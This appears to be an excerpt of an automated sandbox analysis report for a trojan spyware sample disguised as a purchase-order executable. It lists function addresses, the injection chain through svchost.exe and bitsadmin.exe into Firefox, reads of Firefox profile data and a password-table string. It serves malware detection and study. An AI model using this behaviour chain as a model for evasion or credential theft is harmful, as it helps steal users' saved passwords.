                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004103F31_2_004103F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416B8E1_2_00416B8E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416B931_2_00416B93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401C401_2_00401C40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401C3A1_2_00401C3A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E51C1_2_0040E51C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E5231_2_0040E523
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402E491_2_00402E49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402E501_2_00402E50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402F191_2_00402F19
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004027201_2_00402720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA3521_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F01_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037003E61_2_037003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E02741_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C02C01_2_036C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C81581_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036301001_2_03630100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA1181_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F81CC1_2_036F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F41A21_2_036F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037001AA1_2_037001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D20001_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036407701_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036647501_2_03664750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363C7C01_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365C6E01_2_0365C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036405351_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037005911_2_03700591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F24461_2_036F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E44201_2_036E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EE4F61_2_036EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FAB401_2_036FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F6BD71_2_036F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA801_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036569621_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A01_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370A9A61_2_0370A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364A8401_2_0364A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036428401_2_03642840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E8F01_2_0366E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036268B81_2_036268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4F401_2_036B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03682F281_2_03682F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660F301_2_03660F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E2F301_2_036E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632FC81_2_03632FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BEFA01_2_036BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640E591_2_03640E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FEE261_2_036FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FEEDB1_2_036FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652E901_2_03652E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FCE931_2_036FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364AD001_2_0364AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DCD1F1_2_036DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363ADE01_2_0363ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03658DBF1_2_03658DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640C001_2_03640C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630CF21_2_03630CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0CB51_2_036E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362D34C1_2_0362D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F132D1_2_036F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0368739A1_2_0368739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365D2F01_2_0365D2F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B2C01_2_0365B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036452A01_2_036452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367516C1_2_0367516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F1721_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370B16B1_2_0370B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364B1B01_2_0364B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F70E91_2_036F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF0E01_2_036FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EF0CC1_2_036EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C01_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF7B01_2_036FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036856301_2_03685630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F16CC1_2_036F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F75711_2_036F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037095C31_2_037095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DD5B01_2_036DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036314601_2_03631460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF43F1_2_036FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFB761_2_036FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B5BF01_2_036B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367DBF91_2_0367DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365FB801_2_0365FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B3A6C1_2_036B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFA491_2_036FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F7A461_2_036F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EDAC61_2_036EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DDAAC1_2_036DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03685AA01_2_03685AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E1AA31_2_036E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036499501_2_03649950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B9501_2_0365B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D59101_2_036D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AD8001_2_036AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036438E01_2_036438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFF091_2_036FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03603FD21_2_03603FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03603FD51_2_03603FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFFB11_2_036FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641F921_2_03641F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03649EB01_2_03649EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F7D731_2_036F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03643D401_2_03643D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F1D5A1_2_036F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365FDC01_2_0365FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B9C321_2_036B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFCF21_2_036FFCF2
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0355A3524_2_0355A352
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_035603E64_2_035603E6
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034AE3F04_2_034AE3F0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_035402744_2_03540274
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_035202C04_2_035202C0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_035281584_2_03528158
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034901004_2_03490100
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0353A1184_2_0353A118
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_035581CC4_2_035581CC
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_035541A24_2_035541A2
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_035601AA4_2_035601AA
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_035320004_2_03532000
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034C47504_2_034C4750
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034A07704_2_034A0770
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0349C7C04_2_0349C7C0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034BC6E04_2_034BC6E0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034A05354_2_034A0535
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_035605914_2_03560591
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_035524464_2_03552446
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_035444204_2_03544420
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0354E4F64_2_0354E4F6
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0355AB404_2_0355AB40
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_03556BD74_2_03556BD7
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0349EA804_2_0349EA80
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034B69624_2_034B6962
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034A29A04_2_034A29A0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0356A9A64_2_0356A9A6
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034A28404_2_034A2840
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034AA8404_2_034AA840
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034CE8F04_2_034CE8F0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034868B84_2_034868B8
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_03514F404_2_03514F40
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_03542F304_2_03542F30
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034E2F284_2_034E2F28
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034C0F304_2_034C0F30
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_03492FC84_2_03492FC8
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0351EFA04_2_0351EFA0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034A0E594_2_034A0E59
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0355EE264_2_0355EE26
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0355EEDB4_2_0355EEDB
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0355CE934_2_0355CE93
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034B2E904_2_034B2E90
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034AAD004_2_034AAD00
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0353CD1F4_2_0353CD1F
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0349ADE04_2_0349ADE0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034B8DBF4_2_034B8DBF
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034A0C004_2_034A0C00
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_03490CF24_2_03490CF2
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_03540CB54_2_03540CB5
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0348D34C4_2_0348D34C
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0355132D4_2_0355132D
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034E739A4_2_034E739A
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034BB2C04_2_034BB2C0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_035412ED4_2_035412ED
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034BD2F04_2_034BD2F0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034A52A04_2_034A52A0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034D516C4_2_034D516C
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0348F1724_2_0348F172
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0356B16B4_2_0356B16B
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034AB1B04_2_034AB1B0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034A70C04_2_034A70C0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0354F0CC4_2_0354F0CC
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0355F0E04_2_0355F0E0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_035570E94_2_035570E9
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0355F7B04_2_0355F7B0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034E56304_2_034E5630
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_035516CC4_2_035516CC
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_035575714_2_03557571
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_035695C34_2_035695C3
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0353D5B04_2_0353D5B0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034914604_2_03491460
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0355F43F4_2_0355F43F
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0355FB764_2_0355FB76
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_03515BF04_2_03515BF0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034DDBF94_2_034DDBF9
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034BFB804_2_034BFB80
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_03557A464_2_03557A46
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0355FA494_2_0355FA49
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_03513A6C4_2_03513A6C
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0354DAC64_2_0354DAC6
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034E5AA04_2_034E5AA0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_03541AA34_2_03541AA3
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0353DAAC4_2_0353DAAC
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034A99504_2_034A9950
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034BB9504_2_034BB950
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_035359104_2_03535910
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0350D8004_2_0350D800
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034A38E04_2_034A38E0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0355FF094_2_0355FF09
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_03463FD54_2_03463FD5
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_03463FD24_2_03463FD2
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034A1F924_2_034A1F92
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0355FFB14_2_0355FFB1
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034A9EB04_2_034A9EB0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034A3D404_2_034A3D40
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_03551D5A4_2_03551D5A
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_03557D734_2_03557D73
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_034BFDC04_2_034BFDC0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_03519C324_2_03519C32
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_0355FCF24_2_0355FCF2
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_02B91D604_2_02B91D60
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_02B8CE804_2_02B8CE80
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_02B8AE604_2_02B8AE60
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_02B8AFB04_2_02B8AFB0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_02B8AFA94_2_02B8AFA9
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_02B8CC604_2_02B8CC60
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_02B936204_2_02B93620
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_02B9361B4_2_02B9361B
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_02B954204_2_02B95420
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_02BABB404_2_02BABB40
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_037BE3574_2_037BE357
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_037BE4744_2_037BE474
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_037C541C4_2_037C541C
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_037BCB784_2_037BCB78
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_037BE80F4_2_037BE80F
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_037BD8D84_2_037BD8D8
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_037C5C114_2_037C5C11
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: String function: 034E7E54 appears 107 times
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: String function: 0351F290 appears 103 times
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: String function: 0348B970 appears 262 times
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: String function: 0350EA12 appears 86 times
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: String function: 034D5130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03675130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036BF290 appears 103 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0362B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03687E54 appears 107 times
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: String function: 00C17DE1 appears 36 times
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: String function: 00C30AE3 appears 70 times
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: String function: 00C38900 appears 42 times
                Source: PO 4110007694.exe, 00000000.00000003.1654874711.00000000042B3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO 4110007694.exe
                Source: PO 4110007694.exe, 00000000.00000003.1654212049.000000000445D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO 4110007694.exe
                Source: PO 4110007694.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@22/13
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7A06A GetLastError,FormatMessageW,0_2_00C7A06A
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C681CB AdjustTokenPrivileges,CloseHandle,0_2_00C681CB
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C687E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00C687E1
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00C7B3FB
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C8EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00C8EE0D
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_00C7C397
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C14E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00C14E89
                Source: C:\Users\user\Desktop\PO 4110007694.exeFile created: C:\Users\user\AppData\Local\Temp\aut5BE6.tmpJump to behavior
                Source: PO 4110007694.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\PO 4110007694.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: bitsadmin.exe, 00000004.00000003.2066693761.0000000002F57000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000003.2066566608.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000002.4113859069.0000000002F57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PO 4110007694.exeReversingLabs: Detection: 39%
                Source: unknownProcess created: C:\Users\user\Desktop\PO 4110007694.exe "C:\Users\user\Desktop\PO 4110007694.exe"
                Source: C:\Users\user\Desktop\PO 4110007694.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO 4110007694.exe"
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\PO 4110007694.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO 4110007694.exe"Jump to behavior
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PO 4110007694.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 4110007694.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 4110007694.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 4110007694.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 4110007694.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 4110007694.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 4110007694.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 4110007694.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 4110007694.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 4110007694.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 4110007694.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 4110007694.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: netutils.dllJump to behavior
